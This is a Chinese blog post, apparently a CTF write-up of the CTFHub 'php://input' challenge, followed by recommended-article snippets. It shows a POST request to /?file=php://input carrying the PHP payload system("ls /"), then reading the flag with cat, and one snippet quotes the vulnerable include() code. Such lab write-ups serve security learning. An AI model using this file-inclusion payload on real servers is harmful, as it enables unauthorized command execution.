CTFHub_技能树_Web之RCE——“php://input”

最新推荐文章于 2024-08-08 18:00:00 发布
最新推荐文章于 2024-08-08 18:00:00 发布
阅读量3.2k 收藏 8
点赞数 4
分类专栏: # CTF-Web 文章标签: php web 安全 CTF RCE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/107644920
版权

文章目录

–>CTFHub传送门<–

使用工具

  1. Microsoft Edge v84.0.522.40
  2. Burpsuite v2.1

注意:本题使用Hackbar无法得到结果

解题过程

查看网页显示的源码
在这里插入图片描述
我们需要使用php://input来构造发送的指令
查看phpinfo,找到一下字段
在这里插入图片描述
证明是可以使用php://input

使用Burpsuite抓包并转至Repeater
构造包
在这里插入图片描述
方法:POST
目标:/?file=php://input
Body:<?php system("ls /"); ?>

在这里插入图片描述
使用cat访问flag_xxxx即可得到FLAG
在这里插入图片描述

欢迎在评论区留言
感谢浏览

Ho1aAs
关注
专栏目录
cve_2019_0708_bluekeep_rce:蓝皮漏洞利用
04-29
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ...
CTFHub技能树web(持续更新)--RCE--文件包含--php://input
jiuyongpinyin的博客
01-25 1132
php://input 做了两道题才知道自己对于文件包含这里完全没有什么思路,所以还是参考了大神的链接 大神链接:点我看大神链接 这道题打开的题目页: 代码的意思是检验在url的get传参中有没有file这个参数,如果有,从第0位开始,长度必须为6的参数值必须是php://(不知道我这么说,说的清不清楚),符合条件就传入,不符合就返回Hacker。 所以参考了大神链接后,get传入参数flie=php://input: [外链图片转存中…(img-z6pUNpjh-1611544235748)] yo
CTFhub php://input
qq_41497476的博客
07-27 3927
这一次相对于远程包含过滤了php://就不能直接利用 input 伪协议完成命令执行了 <?php if (isset($_GET['file'])) { if ( substr($_GET["file"], 0, 6) === "php://" ) { include($_GET["file"]); } else { echo "Hacker!!!"; } } else { highlight_file(__FILE__); } ?&g
CTFHUB-web-RCE-php://input
最新发布
weixin_68416970的博客
08-08 272
修改 GET 请求为 POST 请求,使用参数 就可以查看到目标站点中的文件,其中 system 是目标系统,括号中的内容执行命令。网页显示源代码,判断如果参数以 php:// 开头,那么执行 include 函数将参数值作为文件包含进来。在根目录发现了名字带有 flag 的文件,使用cat 命令查看这个文件发现了 flag。使用 file 查看 php://input, 感觉这个网页可能存在文件包含漏洞。刷新页面抓个包,拼接一个之后发包,响应成功。
fileclude(文件包含漏洞及php://inputphp://filter的使用)
Welcome To Myon'Blog !
04-16 4662
fileclude、文件包含漏洞、php://inputphp://filter、file_get_contents() 函数、empty()函数、isset函数、PHP伪协议
题解记录-CTFHub技能树|Web|RCE
weixin_57448435的博客
09-15 1067
RCE漏洞,Hackbar插件的使用,cmd命令,运算符、空格、关键字flag、cat。
CTFHubRCEphp://input
cx_sam的博客
08-09 600
CTF WEB RCE php://input
CTFHub技能书解题笔记-RCE-php://input
qq_43006864的博客
02-23 1604
打开题目 很熟悉的源代码界面。 简单的审计一下。 这里提到了php:// 然后if这段代码的意思是file里的前六个字符必须要等于php://(===表示强制等于) 这里回到题目,题目是php://input ,这里引入知识点: php://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data 大家..
ctfhub——php://input
At0m的博客
01-14 7135
首先这道题 有一些知识需要了解。参考 《php伪协议实现命令执行的七种姿势》《php伪协议总结》 首先看一下代码,截取字符串前六个字符需要 与 php://相等,也就是file变量的值 的前六个字符需要与 php://相等。 所以写个题应该是要用到php伪协议。 有一个例子看一下 php伪协议该怎么用。 16年华山杯,源码如下: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($u
Firmware_web_rce_finder:FWRF是用于固件Web端分析的开源工具
05-13
固件Web Rce Finder FWRF(不要尝试将其发音)是用于固件Web端分析的开源工具。 为什么选择FWRF? 由于一些愚蠢的思想,新趋势是将计算机应用于所有事物。 该poc最初是为了测试某些wifi天线固件而编写的。 带有...
shiro_rce_tool:shiro rce tool 反序列 命令执行 一键工具 回显
04-29
shiro_rce 下载地址:https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip 2021-03-31: 新增自定义或随机useragent randomagent --> random useragent useragent= --> set useragent cookiename= --&...
RCE_Web_Shell_Python:与Web Shell交互的python方法
05-27
使用Python与Web Shell进行交互 无论您是经验丰富的渗透测试员还是初学者,渗透测试的领域都是一英里长和一英里深。 所有学科中的机会是无止境的。 进攻安全性提供了一个高级课程,称为高级Web攻击和利用(AWAE) ,...
cve_2019_0708_bluekeep_rce.rb
09-07
2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。...
RCE_1131:iOS 11.3.1 RCE漏洞利用
04-28
!!! 不适用于最终用户!!! 这仅对开发人员感兴趣,不希望以任何形状或形式提供支持! 此漏洞利用通过两个已知的错误从WebContent沙箱(即从网站)获得tfp0:CVE-2018-4233(由saelo发现,由ZDI报告,由niklasb...
RCE.rar_coulomb matlab_rce_拓扑势_概率神经网络
09-23
在IT领域,特别是机器学习和神经网络模型设计中,“RCE.rar_coulomb matlab_rce_拓扑势_概率神经网络”这个标题所涵盖的知识点非常丰富。首先,我们要了解RCE网络,全称为“衰减库仑势”(Radiation-charge exchange...
深信服edr终端检测响应平台(_3.2.21)代码审计挖掘(RCE)1
08-03
【深信服edr终端检测响应平台(3.2.21)代码审计挖掘(RCE)1】涉及的知识点: 1. **代码审计**:代码审计是安全专家通过检查软件源代码或二进制代码,查找潜在的安全漏洞和错误的过程。在本案例中,审计的目标是...
CTFHub | php://input
尼泊罗河伯的博客
06-08 1928
简单分析网页显示内容中的源代码,判断如果参数以 php:// 开头,那么执行 include 函数将参数值作为文件包含进来。否则,输出字符串 Hacker!!! 。
ctfhub-RCE-文件包含 ,php://input,远程包含​,​ 读取源代码, 命令注入,过滤cat,过滤空格,过滤目录分隔符,过滤运算符,综合过滤练习
weixin_55702959的博客
02-02 3998
目录 文件包含 php://input php://input伪协议 远程包含 ​​ 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符 综合过滤练习 文件包含 打开题目发现代码中有shell.txt直接点击shell打开在post发现是没用的,于是换个方式在?file=shell.txt 进行post php://input php:// 输入输出流 PHP 提供了一些杂项输入/输出(IO)流,允许访问...
CTFHub php://input
人若无名,便可专心练剑
08-16 445
用于读取源码用于执行php代码。
CTF挑战:远程命令执行(RCE)与Web安全策略
"了解CTF(Capture The Flag)竞赛中关于远程命令执行RCE)的概念,以及如何在Web安全场景下利用和防范此类漏洞" 远程命令执行RCE)是一种严重的安全漏洞,它允许攻击者通过Web接口执行任意系统命令。当服务器...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值